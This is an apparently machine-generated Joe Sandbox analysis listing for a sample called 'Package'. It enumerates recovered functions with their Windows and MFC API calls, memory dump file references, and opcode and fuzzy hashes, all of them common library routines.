Function 00D2C9F5 Relevance: 7.5, APIs: 5, Instructions: 16COMMONLIBRARYCODE

Download Yara Rule

APIs

#800.MFC42U(?,00D2CA4D), ref: 00D2CA06
#800.MFC42U(?,00D2CA4D), ref: 00D2CA11
#656.MFC42U(?,00D2CA4D), ref: 00D2CA1C
#609.MFC42U(?,00D2CA4D), ref: 00D2CA24

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #800$#609#656
String ID:
API String ID: 1737153938-0
Opcode ID: b32241402a0376f540a3c18c5c3ae481c578d56d80a0b2e5545cb78a974585b5
Instruction ID: 82073ce8058887c44152e13287adc611ea65e2556a1e1ff010bd1360eadb829c
Opcode Fuzzy Hash: b32241402a0376f540a3c18c5c3ae481c578d56d80a0b2e5545cb78a974585b5
Instruction Fuzzy Hash: BCE0EC36080611C7C235EB20E592AEAB792EF64351F50092EB4E7035D1AF706A45CB70

Function 6E2F60A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

C/n, xrefs: 6E2F60A6

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID:
String ID: C/n
API String ID: 0-1270626185
Opcode ID: d432f4aa3e4d23d3deb1605d2172d892d7fe71a8ccddbd85d7d4394854899002
Instruction ID: b0a22474b6e5def5b16c024fce782a28abd1ba316b8bcac09cbab8b7824b9282
Opcode Fuzzy Hash: d432f4aa3e4d23d3deb1605d2172d892d7fe71a8ccddbd85d7d4394854899002
Instruction Fuzzy Hash: 20116D752E420DDFD7016BE98884BCEF7AB9F0A71AF144448D4069B385DBB4CD4787A1

Function 6E2F2EB4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6E2F2E65,00000000,?,00000001,?,?,?,6E2F2F54,00000001,FlsFree,6E2FFBE0,FlsFree), ref: 6E2F2EC1
GetLastError.KERNEL32(?,6E2F2E65,00000000,?,00000001,?,?,?,6E2F2F54,00000001,FlsFree,6E2FFBE0,FlsFree,00000000,?,6E2F2431), ref: 6E2F2ECB
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6E2F2EF3

Strings

api-ms-, xrefs: 6E2F2ED8

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 83e1a1e2cee9a47cea64666a5c005743393c68cb5e7d93f4038611ab371cc7a1
Instruction ID: a3f53f0510fc7e1d0c5b6cd44f50a8263df8aaeafe1eabe8ff89129bfe14008f
Opcode Fuzzy Hash: 83e1a1e2cee9a47cea64666a5c005743393c68cb5e7d93f4038611ab371cc7a1
Instruction Fuzzy Hash: BFE012712C820AF7FF105AA1DC29F4A7E679B01751F308424F90DE8495DBA1A452D964

Function 00D2B463 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Kernel32.dll), ref: 00D2B468
GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00D2B479

Strings

Kernel32.dll, xrefs: 00D2B463
HeapSetInformation, xrefs: 00D2B473

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: HeapSetInformation$Kernel32.dll
API String ID: 1646373207-3460614246
Opcode ID: f208dfab69cd189c5778b910a71a10dc24e6a24a3fe5a178e7dd09f27b6f6962
Instruction ID: f75139eea3a6dadb4bea1b0cfcafde36d4e70f640674ec717464d7613a32a06a
Opcode Fuzzy Hash: f208dfab69cd189c5778b910a71a10dc24e6a24a3fe5a178e7dd09f27b6f6962
Instruction Fuzzy Hash: 4DD05E78B057716BDB602BF17C4DF7B2EDD9B21BA97094411BA05D2290CEA0CC8186B1

Function 6E2FAE87 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(7763BC5F,00000000,00000000,?), ref: 6E2FAEEA

Part of subcall function 6E2F7D04: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6E2FA890,?,00000000,-00000008), ref: 6E2F7D65

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6E2FB13C
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6E2FB182
GetLastError.KERNEL32 ref: 6E2FB225

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 5326e144761edf7d134fd9f09a2d04ced4c2eb4c19bc7c06cb9dd23beae490e8
Instruction ID: af6bca18ab9294ffa7e4310d348297a4a3592c0caf747357d8fc94bb5d7b5169
Opcode Fuzzy Hash: 5326e144761edf7d134fd9f09a2d04ced4c2eb4c19bc7c06cb9dd23beae490e8
Instruction Fuzzy Hash: F4D17CB5D4424DDFDB01CFE8D890AEDFBBAEF09314F24456AE426EB245D630A942CB50

Function 6E2F3038 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6E2F30FF
___AdjustPointer.LIBCMT ref: 6E2F3122
___AdjustPointer.LIBCMT ref: 6E2F31BE

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: ffc3e864152337fd014b3a71f7b6f5d048a1306717f1c00616d1b17aa5ebb120
Instruction ID: 8f73c845bd52d044619e17ecd85ecd7b8163e949cf5a119a0d97b8c468fef2da
Opcode Fuzzy Hash: ffc3e864152337fd014b3a71f7b6f5d048a1306717f1c00616d1b17aa5ebb120
Instruction Fuzzy Hash: D051D27658520FEFEB158F94C958BABF3A6FF00311F14052DD91587290E731E882CB92

Function 00D33940 Relevance: 6.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

#861.MFC42U(?,00000001), ref: 00D339C4
#6325.MFC42U(?,00000001,00000000), ref: 00D33A4F

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: #6325#861
String ID:
API String ID: 3876780826-0
Opcode ID: e20dc983ab6cf1f6cca41c0088d7032b91746931470dcbb753cac106b1ebf096
Instruction ID: fc04dd687bb9d947565fc199be755f2813c4b7d46f3b7a3a3a00c5656214bd7d
Opcode Fuzzy Hash: e20dc983ab6cf1f6cca41c0088d7032b91746931470dcbb753cac106b1ebf096
Instruction Fuzzy Hash: DF41FD71A10208EFCB01DF98D981BADBBB2FF49314F244099E805AB391C7B1AE40CF64

Function 6E2F6AA6 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 6E2F7D04: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6E2FA890,?,00000000,-00000008), ref: 6E2F7D65

GetLastError.KERNEL32 ref: 6E2F6B0A
__dosmaperr.LIBCMT ref: 6E2F6B11
GetLastError.KERNEL32(?,?,?,?), ref: 6E2F6B4B
__dosmaperr.LIBCMT ref: 6E2F6B52

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: d492b2477435b8955a2483167f26fca0b47fe9f0187da530184c5fb7b88071c3
Instruction ID: df38ba5cf749b9f8e1a87e9ae625e3be476aa30d0d9c83f09feac82eeb447369
Opcode Fuzzy Hash: d492b2477435b8955a2483167f26fca0b47fe9f0187da530184c5fb7b88071c3
Instruction Fuzzy Hash: F9215E716A461EEF97119FE5C8D0C5AF7AFEF053657008968E81697240DB71EC128BE0

Function 6E2F7DA7 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 6E2F7DAF

Part of subcall function 6E2F7D04: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6E2FA890,?,00000000,-00000008), ref: 6E2F7D65

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E2F7DE7
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E2F7E07

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 41e25ba5572c9da3f666010b6a1ec18da03ae89293524b24a4b1d50367276c78
Instruction ID: 950fe9bfcf592a3a5ba19b95c1517ffa91336eb727a7ac67f0b0aa41956d4c7d
Opcode Fuzzy Hash: 41e25ba5572c9da3f666010b6a1ec18da03ae89293524b24a4b1d50367276c78
Instruction Fuzzy Hash: 9111E1B65A591EFF6B0216F69C9DCAFAA6FDE466A8710042AF402D1184EF60CD0281B0

Function 00D3C80A Relevance: 6.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

GetAclInformation.ADVAPI32(?,?,0000000C,00000002,00000000,00000000,00000000,?,?,?,?,?,00D3C6E4,00000000,00000000), ref: 00D3C83D
GetAce.ADVAPI32(?,00000000,?,?,?,?,?,?,00D3C6E4,00000000,00000000), ref: 00D3C854
AddAce.ADVAPI32(?,00000002,000000FF,?,?,?,?,?,?,?,00D3C6E4,00000000,00000000), ref: 00D3C86C
GetLastError.KERNEL32(?,?,?,?,?,00D3C6E4,00000000,00000000), ref: 00D3C88F

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: ErrorInformationLast
String ID:
API String ID: 3635006208-0
Opcode ID: 006eee0fbeb803a5a47c35d5ee08592c8b385ea348c45a69bbe077a9b20587cc
Instruction ID: 9913aa6af524c05f4b63dd9807a5ec81dc5ae49ee2e3329f327c262687be6da0
Opcode Fuzzy Hash: 006eee0fbeb803a5a47c35d5ee08592c8b385ea348c45a69bbe077a9b20587cc
Instruction Fuzzy Hash: DE119A71710215ABDB20EFAA9C45BBBB7ACBF46B50F141129B915F6280EA30DA01D7B0

Function 00D37419 Relevance: 6.1, APIs: 4, Instructions: 61registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(00000000,00000000,?,00000040), ref: 00D3743B
RegOpenKeyW.ADVAPI32(00000000,?,?), ref: 00D3745D
RegEnumKeyW.ADVAPI32(?,00000000,?,00000040), ref: 00D37496
RegQueryValueW.ADVAPI32(?,?,?,00000208), ref: 00D374C9
CLSIDFromString.OLE32(00000000,-00000008), ref: 00D37570
wcstol.MSVCRT ref: 00D37610
wcsrchr.MSVCRT ref: 00D3762C
wcstol.MSVCRT ref: 00D37650
wsprintfW.USER32 ref: 00D37696
wsprintfW.USER32 ref: 00D376B9
RegCloseKey.ADVAPI32(?), ref: 00D37743
RegCloseKey.ADVAPI32(00000000), ref: 00D37754

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: CloseEnumwcstolwsprintf$FromOpenQueryStringValuewcsrchr
String ID:
API String ID: 1473628064-0
Opcode ID: bcbb75c605d76316caa080ebaa396d90b6b77c8d33c263ace3ae8da9aad895ea
Instruction ID: fc69d9b9a31135f04c31ba9b61281db04ab0aa1c1fac39d169b2fac6f567f7b8
Opcode Fuzzy Hash: bcbb75c605d76316caa080ebaa396d90b6b77c8d33c263ace3ae8da9aad895ea
Instruction Fuzzy Hash: FD217DB1D086289BEB759B60CC84BE9B7B8EB14305F1401E9E60DA6150D779AF84EF60

Function 00D2CED0 Relevance: 6.0, APIs: 4, Instructions: 44windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00D2CEE9
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00D2CF05
#3297.MFC42U(00000000,00000001,?,00000028), ref: 00D2CF30
#2637.MFC42U(00000001,00000000,00000001,?,00000028), ref: 00D2CF39

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: MessageSend$#2637#3297
String ID:
API String ID: 837686103-0
Opcode ID: 73297cf06c9f2eda92720930f30e9d3c28ea2ec61ade2ae8781e194ff6cdc28c
Instruction ID: 8edbca7bad3ad7f6e1324d46b1b83b7c4a3fd6addd7d50916af499e17f1e56ca
Opcode Fuzzy Hash: 73297cf06c9f2eda92720930f30e9d3c28ea2ec61ade2ae8781e194ff6cdc28c
Instruction Fuzzy Hash: A9F0C2323513257BE2205A61DC8AFABBB5AFB91B65F054021FA05AA0C1C7E1AC5183F1

Function 00D3CAD4 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000000,?,?,00D3CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CAF9
OpenProcessToken.ADVAPI32(00000000,?,?,00D3CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CB00
GetLastError.KERNEL32(?,?,00D3CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CB0A

Part of subcall function 00D3CB3B: GetTokenInformation.ADVAPI32(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,?,00000000,?,?,?,?,00D3CB28,00000000,00000000,?), ref: 00D3CB71
Part of subcall function 00D3CB3B: GetLastError.KERNEL32(?,?,?,00D3CB28,00000000,00000000,?,?,?,00D3CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CB77

CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,?,00D3CE14,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D3CB2D

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: ErrorLastProcessToken$CloseCurrentHandleInformationOpen
String ID:
API String ID: 1647960853-0
Opcode ID: fefe929d4b78958a82cfbf716a1a00af105470111252ac7d3344306cb5b1fc30
Instruction ID: f7865b1bbc21c5bceca47d718cf7bb9ee78fbc1bfb498d4d9f74917df9731c57
Opcode Fuzzy Hash: fefe929d4b78958a82cfbf716a1a00af105470111252ac7d3344306cb5b1fc30
Instruction Fuzzy Hash: 6CF0AF76A10215EBCB109FB5CC0ABABBBB8FF95750F144125B945E7210EA30CD40DBB0

Function 00D3F25C Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00D43B00,?,?,00D2B731,00D43998), ref: 00D3F268
LeaveCriticalSection.KERNEL32(00D43B00,?,?,00D2B731,00D43998), ref: 00D3F29B
SetEvent.KERNEL32(00000000,00D2B731,00D43998), ref: 00D3F32B
ResetEvent.KERNEL32 ref: 00D3F337

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: CriticalEventSection$EnterLeaveReset
String ID:
API String ID: 3553466030-0
Opcode ID: e454a45674fc9dd6209288b07daf856a097ada09f08918e7c4878069b84bc80a
Instruction ID: d02f6cd87a4fef6031a820f64ffe464dd485d34e78953b16c700f162321d04b8
Opcode Fuzzy Hash: e454a45674fc9dd6209288b07daf856a097ada09f08918e7c4878069b84bc80a
Instruction Fuzzy Hash: 38012839A007A4DBCB049F5CFC58E957BA4FB4B351B050029F906D7320CB30AA90CBB4

Function 00D2EEC0 Relevance: 6.0, APIs: 4, Instructions: 35windowCOMMON

Download Yara Rule

APIs

#6330.MFC42U(00000001), ref: 00D2EEC9
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2EEDE
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2EEF2
#2634.MFC42U(00000001), ref: 00D2EF13

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: MessageSend$#2634#6330
String ID:
API String ID: 3857549013-0
Opcode ID: 812eb46cc81d224ecce5c10caba85fc270b3149db4c4c2808f94afb4566dc13b
Instruction ID: 072756e6853975a84fd35270be295e80ab8bddc3b4885a1d035569d5c92be0c6
Opcode Fuzzy Hash: 812eb46cc81d224ecce5c10caba85fc270b3149db4c4c2808f94afb4566dc13b
Instruction Fuzzy Hash: 94F08C301006586BEA325632EE89F9BBBBADBD3755F510419F109860A287715C81C670

Function 00D2E409 Relevance: 6.0, APIs: 4, Instructions: 32windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001304,00000000,00000000), ref: 00D2E41E
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00D2E436

Part of subcall function 00D2E583: #6211.MFC42U(?,0000130B,?,?,00D2D5AA,00000000), ref: 00D2E5BE
Part of subcall function 00D2E583: RedrawWindow.USER32(?,00000000,00000000,00000105,?,0000130B,?,?,00D2D5AA,00000000), ref: 00D2E669

SendMessageW.USER32(?,00001309,00000000,00000000), ref: 00D2E451
#6211.MFC42U(00000000), ref: 00D2E45E

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: MessageSend$#6211$RedrawWindow
String ID:
API String ID: 1685024686-0
Opcode ID: 6a0197df17837543b6d531e12dac6e428ae6d6d9f13f4bfb8c286ceed3cacefc
Instruction ID: 8d42110840b9d4761a69f83f990651f52deb4f5cd027b2a448602970c0698d02
Opcode Fuzzy Hash: 6a0197df17837543b6d531e12dac6e428ae6d6d9f13f4bfb8c286ceed3cacefc
Instruction Fuzzy Hash: 2CF03035104A507BEA312B22EC1DEC76EBDEBC7B15F06001CB21ED20A08B646941CAB0

Function 00D2C6A6 Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F02), ref: 00D2C6C5
SetCursor.USER32(00000000), ref: 00D2C6CC

Part of subcall function 00D2C6F3: SendMessageW.USER32(?,00001009,00000000,00000000), ref: 00D2C722
Part of subcall function 00D2C6F3: SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00D2C78D
Part of subcall function 00D2C6F3: SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00D2C79D
Part of subcall function 00D2C6F3: #2634.MFC42U(00000001,?,?,?,?), ref: 00D2C7C8
Part of subcall function 00D2C6F3: #2634.MFC42U(00000001,00000001,?,?,?,?), ref: 00D2C7D4

LoadCursorW.USER32(00000000,00007F00), ref: 00D2C6DF
SetCursor.USER32(00000000), ref: 00D2C6E6

Memory Dump Source

Source File: 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000005.00000002.2330953250.0000000000D20000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331006021.0000000000D43000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.2331026974.0000000000D44000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_d20000_Package.jbxd

Similarity

API ID: Cursor$MessageSend$#2634Load
String ID:
API String ID: 1037744270-0
Opcode ID: 0554848764724c358a79d4c7dbf600f15e694de5e4563a78d3bd5e3331cb2da2
Instruction ID: 86fd74ff41fb3022abd9f0c15e2eabb3ee7c6de91b4c7a70bd4667ca62f45125
Opcode Fuzzy Hash: 0554848764724c358a79d4c7dbf600f15e694de5e4563a78d3bd5e3331cb2da2
Instruction Fuzzy Hash: A1E0A936600320AB8701AFE1AC49A8B7B5CEF873513000022BA06DA202CBB86807C6F0

Function 6E2FCC26 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6E2FC3D8,00000000,00000001,00000000,?,?,6E2FB279,?,00000000,00000000), ref: 6E2FCC3D
GetLastError.KERNEL32(?,6E2FC3D8,00000000,00000001,00000000,?,?,6E2FB279,?,00000000,00000000,?,?,?,6E2FB81C,00000000), ref: 6E2FCC49

Part of subcall function 6E2FCC0F: CloseHandle.KERNEL32(FFFFFFFE,6E2FCC59,?,6E2FC3D8,00000000,00000001,00000000,?,?,6E2FB279,?,00000000,00000000,?,?), ref: 6E2FCC1F

___initconout.LIBCMT ref: 6E2FCC59

Part of subcall function 6E2FCBD1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6E2FCC00,6E2FC3C5,?,?,6E2FB279,?,00000000,00000000,?), ref: 6E2FCBE4

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6E2FC3D8,00000000,00000001,00000000,?,?,6E2FB279,?,00000000,00000000,?), ref: 6E2FCC6E

Memory Dump Source

Source File: 00000005.00000002.2331705193.000000006E2F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E2F0000, based on PE: true

Associated: 00000005.00000002.2331684375.000000006E2F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331754939.000000006E306000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.2331777988.000000006E308000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6e2f0000_Package.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 6f08df75f9d9ee66d46de25e8d45dbd59b1d6979858362001606c1b99bfba8a0
